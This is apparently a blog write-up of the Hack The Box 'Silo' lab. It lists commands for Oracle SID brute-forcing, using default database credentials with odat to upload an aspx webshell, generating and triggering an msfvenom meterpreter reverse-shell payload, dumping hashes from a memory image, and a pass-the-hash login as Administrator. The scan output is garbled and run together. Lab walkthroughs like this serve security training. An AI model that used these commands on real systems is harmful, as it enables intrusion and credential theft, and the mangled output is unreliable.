HTB: Silo

Enumeration

nmap

nmap -sv 10. 10. 10.82 -OA nmap starting Nmap 7.80 ( https://nmap.org ) at 2020-01-08 07:28 EST Nmap scan report for 10.10. 10.82 Host is up (0.66s latency). Not shown: PORT 80/tcp 135/tcp 139/tcp 445/tcp 1521/tcp 49152/tcp 49153/tcp 49154/tcp 49155/tcp 49158/tcp 49160/tcp 49161/tcp 988 closed ports STATE open open open open open open open open open open open open SERVICE http msrpc netbios-ssn microsoft-ds oracle-tns msrpc msrpc msrpc msrpc msrpc oracle-tns msrpc Service Info: OSS : Windows, VERSION Microsoft IIS httpd 8.5 Microsoft Windows RPC Microsoft Windows netbios-ssn Microsoft Windows Server 2008 R2 2012 microsoft-ds Oracle TNS listener 11.2.0.2.0 (unauthorized) Microsoft Windows RPC Microsoft Windows RPC Microsoft Windows RPC Microsoft Windows RPC Microsoft Windows RPC Oracle TNS listener (requires service name) Microsoft Windows RPC Windows Server 2008 R2 2012; CPE: cpe:/o:microsoft:windows

SID Enumeration

msf5 auxiliary(scanner/oracle/sid brute} > set RHOSTS RHOSTS -3 msf5 auxiliary(scanner/oracle/sid brute} > run SIDS against Checking Caught 571 Checking - Refused Checking - Refused Checking LINUX8174 'ORACLE' ORACLE' [+1 Oracle Oracle Oracle Oracle Oracle Oracle Oracle Oracle Oracle Oracle Oracle interrupt from 'XE' is valid Checking 'ASD8' - Refused 'ASD8' Checking 'IASD8' - Refused 'IASD8' Checking the console.

Password Guesser – odat

Uploading aspx shell for command inejction

./odat-libc2.5-x86_64 dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger –putFile ‘C:\inetpub\wwwroot\’ ‘shell.aspx’ /usr/share/webshells/aspx/cmdasp.aspx –sysdba

Reverse Shell

Or create msfvenom payload for reverse shellmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f aspx > lisa.aspx

Upload the file./odat-libc2.5-x86_64 dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger –putFile ‘C:\inetpub\wwwroot\’ ‘lisa.aspx’ /root/odat2.5/lisa.aspx –sysdba
Call the file for the reverse shellcurl http://10.10.10.82/lisa.aspx

Privilege Escalation

Download the fileIn the dump, to find the valuable info, use Volatile (check Github page)

Volatile

Suggested profiles:python vol.py -f /root/Downloads/SILO-20180105-221806.dmp imageinfo

Sysinfo

python vol.py -f /root/Downloads/SILO-20180105-221806.dmp –profile=Win2012R2x64 hivelist

python vol.py -f /root/Downloads/SILO-20180105-221806.dmp –profile=Win2012R2x64 -y 0xffffc00000028000 -s 0xffffc00000619000 hashdump

Admin Shell – PasstheHash

pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 //10.10.10.82 cmd.exe

Leave a comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.